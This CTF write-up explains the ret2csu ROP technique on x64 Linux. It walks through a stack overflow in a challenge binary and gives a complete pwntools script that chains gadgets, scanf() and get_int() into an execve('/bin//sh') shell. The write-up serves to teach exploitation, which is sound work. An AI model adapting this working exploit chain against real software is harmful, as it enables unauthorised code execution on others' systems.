Based on the Stop, ROP, n’, Roll challenge from this year’s Redpwn CTF, this post explains how to make system calls on x64 using ROP in order to spawn a shell. It also shows how to abuse writable memory regions of a process to overcome difficulties with some ROP gadgets. Best of all, two of the gadgets used in this writeup are universal and most likely also present in your x64 target if it’s using glibc. Of course, everything will be done with radare2 and pwntools.
The challenge binary can be found here.
ret2csu Basics
The ret2csu technique, which was presented at Black Hat Asia in 2018, is based on two specific ROP gadgets that are present in the __libc_csu_init() function. Let’s quote the authors of the ret2csu paper to explain why this function is even there:
The problem appears when an application is Dynamically compiled, which represents 99% of all applications. More precisely when the linker “attaches code” to the ELF executable that is not coming from the source code of the application. In other words the resulting ELF executable contains not only the compiled source code from the application but already compiled code from statically linked libraries “.a” and object files “.o” even when it is dynamically compiled.
In other words, if a binary is dynamically linked and it’s using glibc, these gadgets will be present, even if it’s only a simple Hello World application. These gadgets can be handy for populating certain registers and altering the program flow. Moreover, the gadgets will always be mapped, since __libc_csu_init() is executed before main(). There’s a lot more to this exploitation technique; to fully understand it, I recommend checking out the original paper linked above.
Ok So What Are Those Gadgets?
It seems that the structure of the first gadget varies depending on the compiler version. I’ve found quite a few variations of it, so it’s always worth a check. Below you can find the first gadget as found in the challenge binary:
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword [r12 + rbx*8]
And the second one is:
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
Cool.
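To make the interplay between the two gadgets more concrete, here is a small Python model of them. It is only a toy and not exploit code: the register dictionary, the helper names pop_gadget and mov_call_gadget, and all sample values are made up for illustration. Only the instruction order is taken from the listings above.

```python
# Toy model of the two ret2csu gadgets. All names and values are illustrative.

def pop_gadget(regs, stack):
    """Models: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15"""
    for name in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
        regs[name] = stack.pop(0)  # index 0 models the top of the stack


def mov_call_gadget(regs, memory):
    """Models: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword [r12 + rbx*8]"""
    regs["rdx"] = regs["r15"]
    regs["rsi"] = regs["r14"]
    regs["rdi"] = regs["r13"] & 0xFFFFFFFF  # writing edi zero-extends into rdi
    # The call is indirect: the target is read from memory, not from r12 itself.
    return memory[regs["r12"] + regs["rbx"] * 8]


regs = {}
stack = [0, 0, 0x1000, 0x11, 0x22, 0x33]  # attacker-controlled qwords
memory = {0x1000: 0xDEADBEEF}             # one pointer stored at 0x1000

pop_gadget(regs, stack)
target = mov_call_gadget(regs, memory)
print(hex(regs["rdi"]), hex(regs["rsi"]), hex(regs["rdx"]), hex(target))
```

The values popped into r13, r14 and r15 end up in RDI, RSI and RDX, while r12 and rbx select the pointer that gets called.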
Let’s analyze the challenge binary before finding a way to make use of those gadgets.
The Target
Upon executing the binary, it asks for an input:
[#] number of bytes:
The input is read by the target using the function get_int(), which internally uses scanf() with the %zu format string. This reads an unsigned integer from the user input. Interestingly, the user input serves as the file descriptor parameter for the following read() call:
call sym.get_int # get integer, sets RAX to result value
mov qword [fildes], rax
mov rax, qword [fildes]
mov ecx, eax
lea rax, [buf]
mov edx, 0x186a0 # size
mov rsi, rax # *buf
mov edi, ecx # file descriptor
call sym.imp.read
This means that in order to input additional data via read(), the file descriptor has to be 0, which corresponds to STDIN. Using this read() call it’s possible to overflow buf, which resides at RBP - 0x9. The overflow reaches the return address after 17 bytes, as determined by passing a De Bruijn pattern generated with ragg2 -r -P 100.
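The 17 bytes also match a quick calculation from the stack frame. The sketch below assumes a standard x64 frame in which the saved RBP sits directly below the return address; the constant names are made up for illustration.

```python
# Assumption: standard frame layout, [rbp] = saved RBP, [rbp + 8] = return address.
BUF_OFFSET_FROM_RBP = 0x9  # buf resides at RBP - 0x9
SAVED_RBP_SIZE = 8         # size of the saved frame pointer on x64

# Bytes to write before the return address is reached.
padding = BUF_OFFSET_FROM_RBP + SAVED_RBP_SIZE
print(padding)
```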
First, set a breakpoint in read() at the ret instruction. Using this breakpoint it’s possible to check what’s about to be loaded into the instruction pointer:
[0x7fda3bd53338]> pxr @rsp # Check what's on the top of the stack
0x7fff9bea9518 0x4941414841414741 AGAAHAAI @rsp ascii ('A') # This will be loaded into the instruction pointer
0x7fff9bea9520 0x41414b41414a4141 AAJAAKAA ascii ('A')
[...]
[0x7fda3bd53338]> wopO 0x4941414841414741 # Search for this value in the passed pattern
17
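The same lookup can be reproduced by hand, which shows what wopO does under the hood. This is a minimal sketch: the pattern prefix below is an assumption, reconstructed so that it is consistent with the two qwords visible in the stack dump above, and the variable names are illustrative.

```python
import struct

# Assumed start of the pattern, consistent with the stack dump above.
pattern = b"AAABAACAADAAEAAFAAGAAHAAIAAJAAKAA"
value = 0x4941414841414741  # qword found on top of the stack

# x64 is little-endian, so the lowest byte of the value comes first in memory.
needle = struct.pack("<Q", value)
offset = pattern.find(needle)
print(needle, offset)
```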
Now that the instruction pointer is under control, it’s necessary to develop a plan for the exploitation. While digging around in the binary, the following things can be found:
- The string at 0x00400860 contains some gibberish that ends in /bin//sh, which suggests that a shell can be spawned through exploitation. The double slashes don’t matter in this case.
- One of the unnamed functions, sym.sub_1337, contains a syscall gadget.
Combining these two aspects suggests that a shell can be spawned using a system call. Therefore something like execve("/bin/sh", 0, 0) could potentially be executed.
Building The ROP Chain
The execve system call takes three parameters. This means the registers have to be set up in the following way:
- RDI has to point to /bin//sh
- RSI has to be zero
- RDX also has to be zero
Finding The Gadgets
- RDI could be set via pop rdi; ret at 0x400823
- RSI could be set using pop rsi; pop r15; ret at 0x00400821
Ok so what about RDX?
Unfortunately, this register is not zero by the time the ROP chain is processed, so it has to be set to zero manually.
Of course, the __libc_csu_init() function is also present in this x64 binary. It contains both ret2csu gadgets mentioned before:
- mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword [r12 + rbx*8] at 0x00400800 (jump-to-syscall gadget)
- pop r12; pop r13; pop r14; pop r15; ret at 0x0040081c (POP gadget)
Sure enough, the first gadget can be used to set RDX using r15, which in turn can be controlled with the second gadget.
There’s only one problem: the call qword [r12 + rbx*8] instruction at the end of the first gadget will fail if r12 isn’t set up properly, since this register may point to a memory location we can’t call into. The RBX register is zero at the point of executing this instruction, so it doesn’t have to be addressed.
Dealing With The Call Instruction
Since r12 can be controlled with the second ret2csu gadget, we only have to find a fitting memory location to jump to that doesn’t break the program flow. It makes sense to let the call instruction jump to the syscall gadget, since all registers can be set up accordingly by this point. These things are known now:
- r12 has to point to a memory location that contains the address of the syscall gadget. Remember, it’s call [r12] and not call r12.
- We have scanf() available, which can write user input into a desired location.
- There’s a writable memory location available in the memory space of the process, beginning at 0x602000. This was determined with the dm command of radare2 while debugging the application. Luckily, the start of the memory location doesn’t seem to be used yet :)
With all these things combined, a call to scanf("%zu", 0x602000) could solve this problem. The pwntools library will be used to send the address of the syscall gadget into the target process after scanf() has been called via the ROP chain.
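The following sketch models why this works. Since %zu parses decimal text, the gadget address has to be sent as a decimal string. The dictionary standing in for process memory and the variable names are made up for illustration; the addresses are the ones used in this writeup.

```python
SYSCALL_GADGET = 0x400703  # address of the syscall gadget
RW_REGION = 0x602000       # start of the writable memory region

# What scanf("%zu", 0x602000) expects on stdin: the address as decimal text.
line = str(SYSCALL_GADGET)

# Toy model of process memory after scanf() stored the parsed number.
memory = {RW_REGION: int(line)}

# call qword [r12 + rbx*8] with r12 = 0x602000 and rbx = 0
r12, rbx = RW_REGION, 0
call_target = memory[r12 + rbx * 8]
print(line, hex(call_target))
```

The call lands on the syscall gadget because the instruction reads its target from the memory that r12 points to.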
Getting The Syscall Number
One last thing: the execve system call itself is identified by the number 59. This number has to be loaded into RAX before jumping to the syscall gadget.
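Put together, this is the register state that has to be in place right before the syscall instruction executes. The sketch only prints a summary; the dictionary and constant names are illustrative, and the /bin//sh address is the one used in the exploit script in this post.

```python
EXECVE_NR = 59         # execve system call number on x64 Linux
BINSH_ADDR = 0x400C49  # address of "/bin//sh" inside the binary

wanted = {
    "rax": EXECVE_NR,   # system call number
    "rdi": BINSH_ADDR,  # 1st argument: path of the program to execute
    "rsi": 0,           # 2nd argument: argv = NULL
    "rdx": 0,           # 3rd argument: envp = NULL
}

for reg, val in wanted.items():
    print(f"{reg} = {val:#x}")
```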
Reading a number is what the application does when it runs normally. It uses get_int() for this:
[0x00400600]> pdf@sym.get_int
/ (fcn) sym.get_int 43
| sym.get_int ();
| ; var int32_t var_8h @ rbp-0x8
| ; CALL XREF from main @ 0x400790
| 0x00400710 55 push rbp
| 0x00400711 4889e5 mov rbp, rsp
| 0x00400714 4883ec10 sub rsp, 0x10
| 0x00400718 488d45f8 lea rax, [var_8h]
| 0x0040071c 4889c6 mov rsi, rax
| 0x0040071f 488d3d2c0500. lea rdi, [0x00400c52]
| 0x00400726 b800000000 mov eax, 0
| 0x0040072b e8c0feffff call sym.imp.__isoc99_scanf
| 0x00400730 e8abfeffff call sym.imp.getchar
| 0x00400735 488b45f8 mov rax, qword [var_8h] # RAX = Result
| 0x00400739 c9 leave
\ 0x0040073a c3 ret
The integer that’s being read is returned in RAX, which is just what’s required to call execve at this point.
Ok How To Build The ROP Chain?
Like this:
- Write the address of the syscall gadget into the writable memory region (0x602000) with scanf().
- Get the execve system call number (59) into RAX with get_int().
- Set up the registers with the POP gadget: load the address of /bin//sh and the address of the writable memory region (0x602000).
- Execute the jump-to-syscall gadget
- Have a shell
Or in code:
from pwn import *  # provides p64() and process()

PADDING = 17  # bytes needed to reach the saved return address
BINSH = p64(0x400c49)  # address of "/bin//sh"
SYSCALL = str(0x400703).encode()  # syscall gadget address as decimal text for scanf("%zu")
JUMP_TO_SYSCALL = p64(0x00400800)
POP_RDI = p64(0x400823)
POP_RSI_r15 = p64(0x00400821)
GET_INT = p64(0x00400710)
SCANF = p64(0x004005f0)  # sym.imp.__isoc99_scanf
RET = p64(0x00400831)
POP = p64(0x0040081c)
PAYLOAD = b""
PAYLOAD += b"A" * PADDING
# Setup the parameters for scanf("%zu", 0x602000)
PAYLOAD += POP_RDI
PAYLOAD += p64(0x00400c52) # format string for scanf()
PAYLOAD += POP_RSI_r15
PAYLOAD += p64(0x602000) # rw region
PAYLOAD += p64(0x0) # we don't care about r15 now
# Call scanf()
PAYLOAD += SCANF
# Get the system call number of execve (59) into RAX
PAYLOAD += RET
PAYLOAD += GET_INT
PAYLOAD += POP
PAYLOAD += p64(0x602000) # r12 (for CALL in JUMP_TO_SYSCALL gadget)
PAYLOAD += BINSH # r13 (will be RDI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r14 (will be RSI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r15 (will be RDX via JUMP_TO_SYSCALL gadget)
PAYLOAD += RET
PAYLOAD += JUMP_TO_SYSCALL # already packed with p64() above
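To sanity-check the layout without pwntools, the same chain can be rebuilt with the standard library only. This is a sketch under assumptions: the helper q() is a made-up stand-in for p64(), and the addresses are simply copied from the script above.

```python
import struct


def q(value):
    """Pack a 64-bit little-endian qword (stand-in for pwntools' p64())."""
    return struct.pack("<Q", value)


chain = [
    0x400823, 0x400C52,            # pop rdi; ret -> "%zu" format string
    0x400821, 0x602000, 0x0,       # pop rsi; pop r15; ret -> rw region, unused r15
    0x4005F0,                      # scanf()
    0x400831, 0x400710,            # plain ret, then get_int()
    0x40081C,                      # POP gadget
    0x602000, 0x400C49, 0x0, 0x0,  # r12, r13, r14, r15
    0x400831, 0x400800,            # plain ret, then jump-to-syscall gadget
]

payload = b"A" * 17 + b"".join(q(v) for v in chain)
print(len(payload))
```

Fifteen qwords plus 17 bytes of padding give a payload of 137 bytes, far below the 0x186a0 bytes that read() accepts.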
Exploitation With pwntools
The exploited process reads user input four times:
- The file descriptor: 0 for STDIN
- The actual ROP payload
- The address of the syscall gadget via scanf()
- The system call number of execve via get_int()
Because of this, the exploitation has to be automated with pwntools as follows:
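p = process("./srnr")
p.sendline(b"0") # File descriptor 0 (STDIN) for read()
p.sendline(PAYLOAD) # ROP chain, consumed by read()
p.sendline(SYSCALL) # Address of the syscall gadget
p.sendline(b"59") # System call number of execve for get_int()
p.interactive()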
Here’s a demo of the exploit, starting from the last ROP gadget:
That’s it.